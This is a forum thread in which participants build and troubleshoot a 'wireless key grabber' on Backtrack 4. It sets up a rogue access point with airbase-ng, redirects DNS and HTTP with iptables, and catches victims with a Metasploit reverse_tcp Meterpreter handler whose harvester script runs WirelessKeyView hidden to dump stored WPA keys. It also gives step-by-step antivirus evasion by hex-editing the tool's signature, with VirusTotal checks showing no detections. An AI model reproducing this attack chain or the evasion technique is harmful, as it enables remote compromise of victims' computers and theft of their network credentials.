Wireless key grabber - Backtrack 4

[hm2075]

on the vista machine do an ipconfig and let me know what u get,


i am thinking is there an ipv6 issue here? when doing the same thing on my n95 i monitor the at0 interface with wireshark, i see ipv6 requests and then the n95 phone times out saying no web gateway. just a theory.

as for the wireless key, is this from an xp machine or vista?
the wireless key seems really short for a wpa key hex, it should be 64 characters long like
2cc55237638c88bb528a2d2a14b6e7cb59aa7564991fb082df ed05a689587f03


can someone do the following

create a fake ap using -e command, and then disassociate the client and see if it will connect to our fake ap acting as a legit ap, this is something we couldn't get working with backtrack 3, client would not associate, maybe it will work in bt4. If not I will try it as soon as i get delivery of my usb pen and run bt4 from it. vmware is just too slow to being these things

[williamc]

I've posted a video performing your steps using BT3 and XP:
http://blip.tv/file/1899796/

You'll see at the end that the wireless key is not 64 bits.

I'll post another with Vista so we can walk through the troubleshooting. Thanks for your help!

William

[Takedown32]

can someone do the following

create a fake ap using -e command, and then disassociate the client and see if it will connect to our fake ap acting as a legit ap, this is something we couldn't get working with backtrack 3, client would not associate, maybe it will work in bt4. If not I will try it as soon as i get delivery of my usb pen and run bt4 from it. vmware is just too slow to being these things

Yea i tried everything..There no way to make a client automatically connect to your fake AP unless the real Ap(not fake) has no encryption(or at least wep and you have the key,then it would have no reason to do the attack) and you have cloned the real Ap(same mac channel name(char sensitive)).So fake Ap==real Ap.I just tried it in BT4. Set my real AP in wpa tkip psk ,made my hp laptop autoconnect at it.Then on the other laptop dell with centrino 3945abg
created the clone fake Ap(same mac same channel same name and with no encryption). Then just went to the extreme case.I powered off the real AP so that the hp would see only the Fake clone one(with no encryption) and here it come out that it never connected to the fake one.So there is a paradox.you can only grab keys at those pc who have no keys cause only those can connect to the Fake Ap.
Otherwise connecting manually to a fake Ap everything works.Eset smart security update 28/03/2009 11'46 didn't detect anything.Thank to the hex edit probably.(i scanned the wkv.exe on some online virus checkers and only in one page 2 of them detected it as a 'virus' i think it was avast and mcafee).

I used a non trasparent Ap
And also used the apache2 service coming with Bt4
first copy what's in the WKV folder in the /var/www/ folder



1. start Meterpreter listener

Code:

cd /
cd pentest
cd exploits
cd framework3
./msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 5555
set AutoRunScript /var/www/harvester.rb 
set ExitOnSession false
show options
exploit -j

2.Start the fake Ap

Code:

modprobe tun 
airbase-ng   -e "XX" wlan0 -v

on the test i made i tried every single option of airbaseThere is no way to connect to it(always talking about the encrypted test)


3.configure the IP,s apache, and spoofdns to the apache

Code:

cp '/var/www/dhcpd.conf' '/etc/dhcp3/'
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush	
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
/etc/init.d/dhcp3-server restart

service apache2 start

cd /
cd var/www/
java ServerKernelMain 10.0.0.1 10.0.0.1

I added once again the read lines cause it gave me problems with the dhcp3-server start.With those commands re-added it work.

Once again this is a NON TRANSPARENT Fake Ap

BIG THANK TO hm2075

[hm2075]

I am aware that the -P command isn't working as it should,

hence we can't dissasociate a victim and get them to connect, maybe someone should speak to the aircrack team about this.

[Takedown32]

Here is some more info.
http://forum.aircrack-ng.org/index.php?topic=3247.0



the -P -C 30 work quite well for non encrypted AP.Most clients are redirect to the fake one Independent from the name of the essid specified in the airbase command

By the way new version of WirelessKeyView has been released 1.26 http://www.nirsoft.net/utils/wirelesskeyview.zip

[Takedown32]

Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the dhcp information from the attack box, but get "page cannot be displayed" when browsing. I cannot ping the attack box IP or Gateway, I get "Destination Unreachable".

As for the wireless key in hex, this is what I gets dumped into the WKV folder:

Code:

cat FVPVC.txt
Linksys             WPA-PSK             a78178f5a4050ce82de1              Dell Wireless 1350
w {15CDB4A8-98B9-4285-

Its not 64 bytes, and like I said, crashes Cain when I load it.

William

I found the error why it displays not full WPA-PSK hex key.
In the harvester.rb script change the way wkv.exe is executed from

Code:

client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})

to

Code:

client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stab /#{out}", nil, {'Hidden' => 'false'})

Now it displays the full hex key

and here is the info about the difference bettwen vista and xp

Code:

Notice About WPA-PSK Keys
When you type a WPA-PSK key in Windows XP, the characters that 

you type are automatically converted into a new binary key that 

contains 32 bytes (64 Hexadecimal digits). This binary key cannot 

instantly be converted back to the original key that you typed, but you 

can still use it for connecting the wireless network exactly like the 

original key. In this case, WirelessKeyView displays this binary key in 

the Hex key column, but it doesn't display the original key that you 
typed.
As opposed to Windows XP, Windows Vista doesn't convert the 

WPA-PSK Key that you type into a new binary key, but it simply keep 

the original key that you type. So under Windows Vista, the original 

WPA-PSK key that you typed is displayed in the Ascii key column.

Now is all in airbase-team hands.That's the missing part!!!
Hope to get something soon!!!I know they can

[hm2075]

nice one takedown32,

glad there a people actually following the code and not blindly doing things

for the airbase bit, we will just have to wait until the official 1.0 release, there a few things that need to be fixed as highlighted in the project map

ps if you want wkv to be undetected you need to unpack it first, then open it up in hex editor, scroll somewhere towards the middle and find references to the author/company, change a few characters, that way you screw the signature up and most AV's will not detect it. For the remaining av's that do detect it you will have to hex edit elsewhere, in theory it is possible

[Takedown32]

Yea thanks for the trick.First version 1.26 was detected only by eSafe on virustotal http://www.virustotal.com/analisis/0...58ad016799f529

After editing

http://www.virustotal.com/analisis/5...4a31d85cc0f62d
NONE.

[hm2075]

what did u use to unpack?

i think i used expander in windows, pe -edit??

just need it for reference if other people want to do this

[Takedown32]

No, i always use Universal Extractor v.1.6.0.0 more info here http://www.legroom.net/software/uniextract
Great AllInOne extractor!!!